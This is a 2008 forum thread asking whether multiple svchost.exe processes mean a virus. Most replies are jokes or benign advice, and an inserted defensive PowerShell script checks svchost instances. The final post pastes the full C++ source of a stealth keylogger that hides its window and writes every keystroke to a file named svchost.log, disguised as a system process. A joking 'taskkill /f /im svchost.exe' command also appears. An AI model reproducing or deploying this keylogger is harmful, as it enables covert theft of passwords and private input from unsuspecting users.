sc0rpi0 Posted January 7, 2008
I just checked my Task Manager and there are 8 incidents of svchost.exe. Does this probably mean I have a virus?
SomeoneE1se Posted January 7, 2008
yes best way check google on how to remove it
digip Posted January 7, 2008
> yes best way check google on how to remove it
:shock: Oh nooooos...I must have a virus as well...
felony_destined Posted January 8, 2008
yeah, I've had that before but what scared me the most was the part that said 'host' (svcHOST.exe) what am I hosting? I certainly hope not any type of remote access service.
Sparda Posted January 8, 2008
> :shock: Oh nooooos...I must have a virus as well...
I has a init! I has to reinstall my Kubuntu!
K1u Posted January 11, 2008
It is normal to have various instances of svchost... it maintains several internal processes so it is normal to have various running. Does this mean that it is safe? Absolutely not, someone could have easily created an application to name itself as svchost.exe and make itself a SYSTEM process. How will you ever know the difference? Well... AVs, etc... may detect some differences in specific things of the process. Is it possible to make it undetectable by AVs? Yes.
arran Posted January 11, 2008
Multiple instances of svchost.exe don't necessarily mean you're infected with a virus. Anyway, just to be sure, check the entries under HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost
http://support.microsoft.com/kb/314056
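Added example, not part of any post in this thread: one way to run the checks discussed above (image path, parent process, the SvcHost registry groups) against every running svchost.exe. It assumes PowerShell 3.0 or later in an elevated session; the path and services.exe-parent checks are heuristics, so a finding is a lead to review, not a verdict.

```powershell
# Added example: triage each running svchost.exe. Run elevated, otherwise
# ExecutablePath and CommandLine can come back empty for SYSTEM processes.
$allowed = @(
    (Join-Path $env:SystemRoot 'System32\svchost.exe'),
    (Join-Path $env:SystemRoot 'SysWOW64\svchost.exe')   # 32-bit host on 64-bit Windows
)
# Value names under this key are the service groups a real svchost is started with (-k <group>).
$groupKey    = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost'
$validGroups = (Get-Item -Path $groupKey).GetValueNames()
$services    = Get-CimInstance Win32_Service

$report = foreach ($p in Get-CimInstance Win32_Process -Filter "Name = 'svchost.exe'") {
    $findings = @()

    # 1. Image path: anything outside the system directory is only borrowing the name.
    if (-not $p.ExecutablePath)                      { $findings += 'path unreadable (not elevated?)' }
    elseif ($allowed -notcontains $p.ExecutablePath) { $findings += 'unexpected image path' }

    # 2. Parent: service hosts are launched by the Service Control Manager (services.exe).
    $parent = Get-CimInstance Win32_Process -Filter "ProcessId = $($p.ParentProcessId)"
    if (-not $parent -or $parent.Name -ne 'services.exe') {
        $findings += "parent is '$($parent.Name)', not services.exe"
    }

    # 3. Command line: must name a group that exists under the Svchost registry key.
    if ($p.CommandLine -match '-k\s+(\S+)') {
        if ($validGroups -notcontains $Matches[1]) { $findings += "unknown group '$($Matches[1])'" }
    } else {
        $findings += 'no -k <group> on command line'
    }

    # 4. Hosted services: a genuine instance hosts at least one registered service.
    $hosted = @($services | Where-Object { $_.ProcessId -eq $p.ProcessId } | ForEach-Object Name)
    if ($hosted.Count -eq 0) { $findings += 'hosts no registered service' }

    [pscustomobject]@{
        ProcessId = $p.ProcessId
        Path      = $p.ExecutablePath
        Services  = $hosted -join ','
        Findings  = $(if ($findings) { $findings -join '; ' } else { 'ok' })
    }
}
$report | Sort-Object Findings -Descending | Format-Table -AutoSize -Wrap
```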
sablefoxx Posted January 18, 2008
Just "taskkill /f /im svchost.exe" see what happens, if nothing bad does, it was a virus, move to the next one, hehe. (jk)
digip Posted January 18, 2008
> (jk)
Yeah, it's going to kill all of them including the legit ones and cause a reboot. You can use the PID though instead to go one at a time to make sure it's a legit file. Kill only the one in question.
TASKKILL /F /PID 1234 /T
where 1234 is the PID of the program in question and T kills any processes started by the rogue program.
SomeoneE1se Posted January 18, 2008
in the end you have a virus you phail at keeping your computer clean, go get some antivirus
sablefoxx Posted January 19, 2008 Posted January 19, 2008 It is normal to have various instances of svchost... it maintains several internal processes so it is normal to have various running. Does this mean that it is safe? Absolutely not, someone could have easily created a application to name itself as svchost.exe and make itself a SYSTEM process. You mean like this:     /*########################################################## ## SvChost.cpp                      ## ## Writen by Ep$sil0n                    ## ## Language C Plus Plus                   ## ## Features Stealth Keyloggger, Writes to file SvChost.log## ###########################################################*/ #include <windows.h> #include <stdio.h> #include <winuser.h> #include <windowsx.h> #define BUFSIZE 80 int test_key(void); int create_key(char *); int get_keys(void); int main(void) {   HWND stealth; /*creating stealth (window is not visible)*/   AllocConsole();   stealth=FindWindowA("ConsoleWindowClass",NULL);   ShowWindow(stealth,0);          int get_keys();     return get_keys(); } int get_keys(void) {       short character;        while(1)        {             Sleep(10); // dont want 100% cpu usage             for(character=8;character<=222;character++)             {               if(GetAsyncKeyState(character)==-32767)               {                                   FILE *file;                 file=fopen("svchost.log","a+"); //create file to write to                 if(file==NULL)                 {                     return 1; // return an error if anything goes wrong                 }                      if(file!=NULL)   // if the file was created or was there                 {        // go on with the keylogger                     if((character>=39)&&(character<=64))                     {                        fputc(character,file);                        fclose(file);                        break;                     }                        else 
if((character>64)&&(character<91))                     {                        character+=32;                        fputc(character,file);                        fclose(file);                        break;                     }                     else                     {                       switch(character)      //pretty self explanatory                       {                          case VK_SPACE:                          fputc(' ',file);                          fclose(file);                          break;                           case VK_SHIFT:                          fputs("[SHIFT]",file);                          fclose(file);                          break;                                               case VK_RETURN:                          fputs("n[ENTER]",file);                          fclose(file);                          break;                          case VK_BACK:                          fputs("[BACKSPACE]",file);                          fclose(file);                          break;                          case VK_TAB:                          fputs("[TAB]",file);                          fclose(file);                          break;                          case VK_CONTROL:                          fputs("[CTRL]",file);                          fclose(file);                          break;                           case VK_DELETE:                          fputs("[DEL]",file);                          fclose(file);                          break;                          case VK_OEM_1:                          fputs("[;:]",file);                          fclose(file);                          break;                          case VK_OEM_2:                          fputs("[/?]",file);                          fclose(file);                          break;                          case VK_OEM_3:                          fputs("[`~]",file);                          fclose(file);                          break;                          
case VK_OEM_4:                          fputs("[ [{ ]",file);                          fclose(file);                          break;                          case VK_OEM_5:                          fputs("[|]",file);                          fclose(file);                          break;                                         case VK_OEM_6:                          fputs("[ ]} ]",file);                          fclose(file);                          break;                          case VK_OEM_7:                          fputs("['"]",file);                          fclose(file);                          break;                          case VK_NUMPAD0:                          fputc('0',file);                          fclose(file);                          break;                          case VK_NUMPAD1:                          fputc('1',file);                          fclose(file);                          break;                          case VK_NUMPAD2:                          fputc('2',file);                          fclose(file);                          break;                          case VK_NUMPAD3:                          fputc('3',file);                          fclose(file);                          break;                          case VK_NUMPAD4:                          fputc('4',file);                          fclose(file);                          break;                          case VK_NUMPAD5:                          fputc('5',file);                          fclose(file);                          break;                          case VK_NUMPAD6:                          fputc('6',file);                          fclose(file);                          break;                          case VK_NUMPAD7:                          fputc('7',file);                          fclose(file);                          break;                          case VK_NUMPAD8:                          fputc('8',file);                          fclose(file);                     
     break;                          case VK_NUMPAD9:                          fputc('9',file);                          fclose(file);                          break;                          case VK_CAPITAL:                          fputs("[CAPS LOCK]",file);                          fclose(file);                          break;                          default:                          fclose(file);   //close the file                          break;                     }                       }                 }              }          }                           }       return EXIT_SUCCESS;    //exit success :D          }  Quote